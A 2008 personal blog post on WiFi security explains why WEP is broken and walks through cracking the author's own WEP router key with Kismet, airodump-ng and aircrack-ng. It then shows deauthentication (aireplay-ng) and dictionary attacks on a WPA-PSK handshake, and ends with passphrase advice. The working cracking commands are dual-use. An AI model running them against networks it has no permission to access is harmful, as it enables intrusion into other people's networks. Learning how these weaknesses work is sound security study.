Home
Guestbook
Cv
My projects
Contact me
Some Photos ;)
Running activities 
Radioamator activities 
LinksWIFI, what is the state of security ?
writed : 27/1/2008
updated :
Wep, the end ?
Recently i've check WPA and WEP key and security, of course now it sure that WEP is insecure, due to key management.
The main problem with wep is to change to wpa when you've got an old equipement, or wireless card ....
WEP use a RC4 (symmetric stream sypher that support variable key). WEP use 40 and 128 bits keys witch is fixed by configuration.
The big problem with the WEP is the initializationvector, it use 24 bits, but it never rotate the encryption key. Some cryptanalysts (Flusher, Mantin and Shamir) discovered inherent shortcoming inside the RC4 algorythm.
This attack can work here because insinde WEB frame the first byte of the plain text come inside WEP LLC/SNAP Header part, it 100% clear inside, It work with a capture of 100.000 to 1 million of packets.
The FSM attack was implemented by aircrack tools, i purpose a simple test (here i've attacked my FREEBOX based on wep key, for the test only....)
Kismet snif !
For this example, i'll used BACKTRACK linux distribution (live cd), this distribution provide security tools without any installation !!, simply boot on it.
(Some infos here : http://backtrack.offensive-security.com/index.php/Main_Page )
After the boot i configure my WL167G (USB WIFI SSTICK from ASUS) ;)
/usr/local/etc/kismet.conf
source=rt2500,rausb0,rt2500
After i simply open a terminal and tape kismet :
- First we need more info about the AP target and here i'll try to retreive maximum info about it like
- encryption key used
- clients connected
- radio signal strenght
and more :=)
After launching KISMET ( a sniffer wifi tools) i've found my freebox,
and i get this information (press s and up/down key to select) :
By press [C] on the ap list name i can optain the client list :
Inside Kismet you can also use : [R] (display network graph), [S] to select acces point.
So now i 've some informations interresting about my network :
- clients mac adress, SSID ( service set identifier),
-
BSSID ( mac adress of AP inside infrastructure mode networks).
Kismet provide output format like :
- packets dump (witch can be use with aircrack)
- Log formats
XML format like this :
<wireless-network number="19" type="infrastructure" wep="true" cloaked="false" first-time="Fri Jan 25 06:43:25 2008" last-time="Fri Jan 25 06:47:34 2008">
<BSSID>46:A5:E8:74:52:AE</BSSID>
<channel>13</channel>
<maxrate>11.0</maxrate>
<maxseenrate>0</maxseenrate>
<encryption>WEP</encryption>
<encryption>WPA</encryption>
<encryption>PSK</encryption>
<encryption>AES-CCM</encryption>
<packets>
<LLC>99</LLC>
<data>0</data>
<crypt>0</crypt>
<weak>0</weak>
<dupeiv>0</dupeiv>
<total>99</total>
</packets>
<datasize>0</datasize>
<gps-info unit="metric">
<min-lat>90.000000</min-lat>
<min-lon>180.000000</min-lon>
<min-alt>0.000000</min-alt>
<min-spd>0.000000</min-spd>
<max-lat>-90.000000</max-lat>
<max-lon>-180.000000</max-lon>
<max-alt>0.000000</max-alt>
<max-spd>0.000000</max-spd>
</gps-info>
</wireless-network>
Let's crack it with airodump tool :
First i start with a sniffer on channel 13, it capture only IVS (with bssid that i've colleted via kismet and with the output name : test_wep_free !
bt ~ # airodump-ng -i rausb0 -c 13 -w test_wep_free --bssid D2:DB:30:69:40:C8
Now i've to run the FMS tools on the capture (it's not nessecary to stop airodump !!!), this crack can failed if IVS are not suffisent :
bt ~ # aircrack-ng test_wep_free-01.ivs
Finnaly i've got the key :
The key is found finnaly, here with a normal web traffic (no injections paquets used), 20000 IVS were used.
So theses commands can be found everywhere on internet , the classical wep is definitivly dead.
TKIP
IEEE i've created a new system : TKIP it based on WEP and RC4 but the key process but they add a "dynamic" vector initialisation. This system enforce the WEP by temporal vector encryption change. It really a good idea because this system is compatible with devide "wep" compatible only.
[ethernet frame ip] ---- [ Network header (IP) ] ---- [ Segment Header] ---- [secure dynamic IV] ---- [ data] ---- [MIC ]
The main problem with this system was the implementation (witch is different between constructor).
So WIFI-GROUP create a new system of TKIP based on standard definitions the WPA.
So .... i've configure WPA on my network !!!!
Ok ... is it really absolutly secure ?
NO
This attack need a connected client, like the wep key i launch a sniffer : irodump-ng --write test-ap-wpa [INTERFACE]
After that i deconnect an access point client i sniff the client "re"connection :
aireplay-ng -0 20 -a [MAC AP] -c [MAC CLIENTE] [INTERFACE]
Finnaly i've simply to do a brut force attack on it :
aircrack-ng test-ap-wpa.cap -w test.dic
Secure methods on WPA-PSK
So it's a good question to search a good method to secure wireless network, to do that we need to have WPA. After that we've to be sure that passphrase we use is secure to protect our network, with dictionnary attack :
http://www.renderlab.net/projects/WPA-tables/
Biblio
Wikipedia definition and WEP info :
http://en.wikipedia.org/wiki/Fluhrer,_Mantin,_and_Shamir_attack
An exelent french article about WEP algo :
http://sid.rstack.org/blog/index.php/57-pourquoi-c-est-pourri-le-wep-part-2-cassage-en-regle
Aircrack tools :